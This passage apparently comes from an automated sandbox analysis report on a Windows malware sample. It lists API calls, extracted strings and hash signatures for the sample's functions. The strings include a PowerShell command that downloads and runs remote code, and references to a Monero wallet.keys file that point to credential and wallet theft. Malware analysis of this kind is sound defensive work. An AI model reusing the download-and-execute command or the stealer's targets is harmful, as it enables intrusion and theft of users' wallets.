                              • lstrcat.KERNEL32(?,?), ref: 00FC485B
                              • lstrcat.KERNEL32(?,00DECDF0), ref: 00FC486F
                                • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                                • Part of subcall function 00FC8D90: GetFileAttributesA.KERNEL32(00000000,?,00FB1B54,?,?,00FD564C,?,?,00FD0E1F), ref: 00FC8D9F
                                • Part of subcall function 00FC4570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00FC4580
                                • Part of subcall function 00FC4570: RtlAllocateHeap.NTDLL(00000000), ref: 00FC4587
                                • Part of subcall function 00FC4570: wsprintfA.USER32 ref: 00FC45A6
                                • Part of subcall function 00FC4570: FindFirstFileA.KERNEL32(?,?), ref: 00FC45BD
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                              • String ID:
                              • API String ID: 2540262943-0
                              • Opcode ID: 8ccbb2d8bc453ae06a491ae7e70d234e8717f10a234968b7cde7f9928335610b
                              • Instruction ID: 392d0424c6bce28536623997a32818de49cf7719c1bd493ef9d0674759ebb8e1
                              • Opcode Fuzzy Hash: 8ccbb2d8bc453ae06a491ae7e70d234e8717f10a234968b7cde7f9928335610b
                              • Instruction Fuzzy Hash: 993162B690021857CB24F7A0DC86FE97378AF48700F40459DB31996081EEB8A6C99B95
                              APIs
                                • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                                • Part of subcall function 00FCA9B0: lstrlen.KERNEL32(?,00DE8DF8,?,\Monero\wallet.keys,00FD0E17), ref: 00FCA9C5
                                • Part of subcall function 00FCA9B0: lstrcpy.KERNEL32(00000000), ref: 00FCAA04
                                • Part of subcall function 00FCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FCAA12
                                • Part of subcall function 00FCA920: lstrcpy.KERNEL32(00000000,?), ref: 00FCA972
                                • Part of subcall function 00FCA920: lstrcat.KERNEL32(00000000), ref: 00FCA982
                                • Part of subcall function 00FCA8A0: lstrcpy.KERNEL32(?,00FD0E17), ref: 00FCA905
                              • ShellExecuteEx.SHELL32(0000003C), ref: 00FC2D85
                              Strings
                              • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00FC2CC4
                              • <, xrefs: 00FC2D39
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00FC2D04
                              • ')", xrefs: 00FC2CB3
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                              • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              • API String ID: 3031569214-898575020
                              • Opcode ID: 7a15d8216b0de56d73d5b2bebbf0024ae6be9926345dcf1122c117e22b5cb2cb
                              • Instruction ID: 5e1e31676f812e5342e52b0100bfb55643f9d54a64d1cb1e9c842e00c58fd3a9
                              • Opcode Fuzzy Hash: 7a15d8216b0de56d73d5b2bebbf0024ae6be9926345dcf1122c117e22b5cb2cb
                              • Instruction Fuzzy Hash: 3341B97181020D9BDB18EBA0DD97FEDB774AF10304F40411DE016AA1D1EF786A4AEF96
                              APIs
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00FB9F41
                                • Part of subcall function 00FCA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FCA7E6
                                • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$AllocLocal
                              • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                              • API String ID: 4171519190-1096346117
                              • Opcode ID: 9e9c89b0d39fc7c55a802db065c0cd8cc8e9ecba9643cbc4b2c4da7167764cab
                              • Instruction ID: c7dbb96839b949bbe04420bec4aad3aae57b3271fbcd26912b7bd2e5f756aa73
                              • Opcode Fuzzy Hash: 9e9c89b0d39fc7c55a802db065c0cd8cc8e9ecba9643cbc4b2c4da7167764cab
                              • Instruction Fuzzy Hash: 1A614C71A0020CABDB24EFA5CD96FED7775BF44344F048118F90A5B281EB786A05EF52
                              APIs
                              • RegOpenKeyExA.ADVAPI32(80000001,00DECE30,00000000,00020119,?), ref: 00FC40F4
                              • RegQueryValueExA.ADVAPI32(?,00DEE328,00000000,00000000,00000000,000000FF), ref: 00FC4118
                              • RegCloseKey.ADVAPI32(?), ref: 00FC4122
                              • lstrcat.KERNEL32(?,00000000), ref: 00FC4147
                              • lstrcat.KERNEL32(?,00DEE220), ref: 00FC415B
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$CloseOpenQueryValue
                              • String ID:
                              • API String ID: 690832082-0
                              • Opcode ID: 2cd82810e82c479980ea2231c776630473e7ff67576512994c63e66879f8f152
                              • Instruction ID: 89ddc70a09cffd65d42c840033be18a837175423143535cb83d7445ffda984d5
                              • Opcode Fuzzy Hash: 2cd82810e82c479980ea2231c776630473e7ff67576512994c63e66879f8f152
                              • Instruction Fuzzy Hash: BF41EAB6D001086BDB28EBA0EC57FED373CBB48340F44455CB62957185EA795BC88BE1
                              APIs
                              • GetSystemTime.KERNEL32(?), ref: 00FC696C
                              • sscanf.NTDLL ref: 00FC6999
                              • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00FC69B2
                              • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00FC69C0
                              • ExitProcess.KERNEL32 ref: 00FC69DA
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Time$System$File$ExitProcesssscanf
                              • String ID:
                              • API String ID: 2533653975-0
                              • Opcode ID: b08c64b4e23dcdb9214faf6ae1e26ff99f84427d8fe895844db4b5e745dcf543
                              • Instruction ID: 0013c20cde79ceeb0cf974ae05ffa057f2f4fda2db9d2775cac92aff22e90b31
                              • Opcode Fuzzy Hash: b08c64b4e23dcdb9214faf6ae1e26ff99f84427d8fe895844db4b5e745dcf543
                              • Instruction Fuzzy Hash: 2821EC75D04209ABCF08EFE4E946AEEB7B5BF48300F04852EE41AE3244EB346605CB65
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00FC7E37
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00FC7E3E
                              • RegOpenKeyExA.ADVAPI32(80000002,00DDC0D0,00000000,00020119,?), ref: 00FC7E5E
                              • RegQueryValueExA.ADVAPI32(?,00DECE70,00000000,00000000,000000FF,000000FF), ref: 00FC7E7F
                              • RegCloseKey.ADVAPI32(?), ref: 00FC7E92
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID:
                              • API String ID: 3225020163-0
                              • Opcode ID: 00e2401850bc0e8040b3d468d97a50b1ee6d93b4fe506bfa3eb9ee0c1e250efe
                              • Instruction ID: 9b4c309deb7cde7a862176b624cd069f7200f2a458e0296b3ed85c8889163707
                              • Opcode Fuzzy Hash: 00e2401850bc0e8040b3d468d97a50b1ee6d93b4fe506bfa3eb9ee0c1e250efe
                              • Instruction Fuzzy Hash: 251191B2A44205EBD714DF94E94AF7FBBB8EB44711F10422DF61AA7284D77858009FA0
                              APIs
                              • StrStrA.SHLWAPI(00DEE058,?,?,?,00FC140C,?,00DEE058,00000000), ref: 00FC926C
                              • lstrcpyn.KERNEL32(011FAB88,00DEE058,00DEE058,?,00FC140C,?,00DEE058), ref: 00FC9290
                              • lstrlen.KERNEL32(?,?,00FC140C,?,00DEE058), ref: 00FC92A7
                              • wsprintfA.USER32 ref: 00FC92C7
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpynlstrlenwsprintf
                              • String ID: %s%s
                              • API String ID: 1206339513-3252725368
                              • Opcode ID: 1f2d713b0105dea11d874a2b9abbde0cbbde1ce96a7a26cb27052cefe3a54edc
                              • Instruction ID: 22ce5e7699ce556979e955153785c421e72d44140cc0869293c44fd52a201396
                              • Opcode Fuzzy Hash: 1f2d713b0105dea11d874a2b9abbde0cbbde1ce96a7a26cb27052cefe3a54edc
                              • Instruction Fuzzy Hash: D401E975500108FFCB08DFE8D988EAE7BB9EF44350F10854CF90D97204C675AA41DB90
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00FB12B4
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00FB12BB
                              • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00FB12D7
                              • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00FB12F5
                              • RegCloseKey.ADVAPI32(?), ref: 00FB12FF
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID:
                              • API String ID: 3225020163-0
                              • Opcode ID: 9ebac140fa1e4e1b5d9a7617492cb2ab80855aebfd3d8c1521332f8dda39bcc8
                              • Instruction ID: 5f1f182d3099c857601fbd94634889fa4a076a77d579c8c53897f02e0a68323b
                              • Opcode Fuzzy Hash: 9ebac140fa1e4e1b5d9a7617492cb2ab80855aebfd3d8c1521332f8dda39bcc8
                              • Instruction Fuzzy Hash: 3A0136B9A40208BFDB14DFD0E849FAEB7B8EF48701F008159FA1997284D675AA418F50
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: String___crt$Type
                              • String ID:
                              • API String ID: 2109742289-3916222277
                              • Opcode ID: 72c6dc89013b166e89886936ebd614f1b352a5b3a42776681a4e8cada7c0963b
                              • Instruction ID: 23b3795d9406d53db5b4ad3b4845ea83d6736969016aa3f1d4cbbdf62cc6896f
                              • Opcode Fuzzy Hash: 72c6dc89013b166e89886936ebd614f1b352a5b3a42776681a4e8cada7c0963b
                              • Instruction Fuzzy Hash: 8D41E5B150079D5EDB218B248E86FFBBBE89B45704F1444ECE98E86182D2719A45EFA0
                              APIs
                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00FC6663
                                • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                                • Part of subcall function 00FCA9B0: lstrlen.KERNEL32(?,00DE8DF8,?,\Monero\wallet.keys,00FD0E17), ref: 00FCA9C5
                                • Part of subcall function 00FCA9B0: lstrcpy.KERNEL32(00000000), ref: 00FCAA04
                                • Part of subcall function 00FCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FCAA12
                                • Part of subcall function 00FCA8A0: lstrcpy.KERNEL32(?,00FD0E17), ref: 00FCA905
                              • ShellExecuteEx.SHELL32(0000003C), ref: 00FC6726
                              • ExitProcess.KERNEL32 ref: 00FC6755
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                              • String ID: <
                              • API String ID: 1148417306-4251816714
                              • Opcode ID: e750acf5ad003f382054451ae9ebdbcdc71b811f41550c9f67278f567ddafef0
                              • Instruction ID: 42cba3e3a9a002c234a48443144b782b92c4bcde464dff908591c50b4ec652ce
                              • Opcode Fuzzy Hash: e750acf5ad003f382054451ae9ebdbcdc71b811f41550c9f67278f567ddafef0
                              • Instruction Fuzzy Hash: 9D3127B1801219ABDB18EB90DD96FDEB778AF04304F40419CF21A67191DF787A89CF69
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00FD0E28,00000000,?), ref: 00FC882F
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00FC8836
                              • wsprintfA.USER32 ref: 00FC8850
                                • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
